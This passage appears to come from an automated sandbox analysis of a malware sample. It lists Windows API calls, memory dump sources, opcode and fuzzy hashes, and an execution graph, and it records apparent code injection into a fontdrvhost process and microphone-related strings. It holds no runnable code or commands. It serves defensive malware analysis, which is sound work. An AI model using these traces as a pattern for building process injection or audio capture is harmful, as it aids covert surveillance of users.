                                                                                                                                                                                                          • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                          • Opcode ID: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                          • Instruction ID: 9eb4f438231cdf1f5a0390a81fae76cf41a7faa79662d3ed8606b3b5fb6622e9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14510F72605206EFDF29CF54F985BAAB7A4EF58310F24452DE802872A1E73DEC51CB91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                            • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 188302963-0
                                                                                                                                                                                                          • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                          • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                            • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                            • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                            • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                            • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                            • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                            • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                          • String ID: echosuppression$gain
                                                                                                                                                                                                          • API String ID: 967401230-1829011300
                                                                                                                                                                                                          • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                          • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,00153804), ref: 00509F3D
                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 662013055-0
                                                                                                                                                                                                          • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                          • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0079DEAD
                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0079DEC6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000003.1625143937.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_3_770000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value___vcrt_
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1426506684-0
                                                                                                                                                                                                          • Opcode ID: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                          • Instruction ID: 00b83a8abc7ce385ab32bf354e41978ee56b478a752cb83b12f0cae4687b3bd0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5c6c870cbe02360b2234619489db598323c740032db365f4575ed4472c763a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801FC32149351AEAE3537747CCA96A27A9EB56774B200329F525491E1EF2D5C016344
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                          • String ID: Macromed\Flash\
                                                                                                                                                                                                          • API String ID: 2606042488-1438515271
                                                                                                                                                                                                          • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                          • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                          • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                          • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                          • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00790326
                                                                                                                                                                                                            • Part of subcall function 007900A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007900CD
                                                                                                                                                                                                            • Part of subcall function 007900A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00790279
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00790378
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 007903E7
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00790407
                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0079042E
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00790456
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 00790471
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000018.00000003.1626071249.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_790000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                          • API String ID: 3867569247-3772416878
                                                                                                                                                                                                          • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                          • Instruction ID: 054eba446c7df9ae4fcba254d0aa6d467726a065bfea70a5b84466ba5f211766
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD611EB5910609EFDF20DFA9C884ADEBBB9FF08350F148519FA59E7250D734A950CBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007900CD
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00790279
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000018.00000003.1626071249.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_790000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                          • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                          • Instruction ID: 2bac21c90c9cfd942797ee19f483476bb89dfc03a73f8a363dfeef74088d1133
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D719971A1424ADFDF41CF98D885BEDBBF0BB09314F284095E465FB241C238AA91DFA4

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:33.4%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                          Signature Coverage:83.3%
                                                                                                                                                                                                          Total number of Nodes:24
                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                          execution_graph 415 205bfc31cf4 417 205bfc31d19 415->417 416 205bfc31fa1 417->416 426 205bfc315c0 417->426 419 205bfc31f98 CloseHandle 419->416 420 205bfc31f88 NtAcceptConnectPort 420->419 421 205bfc31e3a 421->419 421->420 423 205bfc31ecd 421->423 429 205bfc30ac8 421->429 423->423 435 205bfc31aa4 NtAcceptConnectPort 423->435 427 205bfc315f4 NtAcceptConnectPort 426->427 427->421 430 205bfc30c62 429->430 431 205bfc30ae8 429->431 430->423 431->430 432 205bfc30be8 NtAcceptConnectPort 431->432 432->430 433 205bfc30c1b 432->433 433->430 434 205bfc30c33 NtAcceptConnectPort 433->434 434->430 436 205bfc31af7 435->436 437 205bfc31c04 435->437 441 205bfc31870 436->441 437->420 439 205bfc31b10 440 205bfc31bb6 NtAcceptConnectPort 439->440 440->437 442 205bfc31889 441->442 443 205bfc31930 GetProcessMitigationPolicy 442->443 444 205bfc31949 442->444 443->444 444->439

                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3811980168-0
                                                                                                                                                                                                          • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                          • Instruction ID: a1927d5dcb832765c6c2d9682bad2ff0179618d4272c96c7b6ec3cdbfdb4e4f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C91C430908F188FDB65EF1CC4457EA77E1FB88354F14565ED48BC729AEA34AD828B81

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
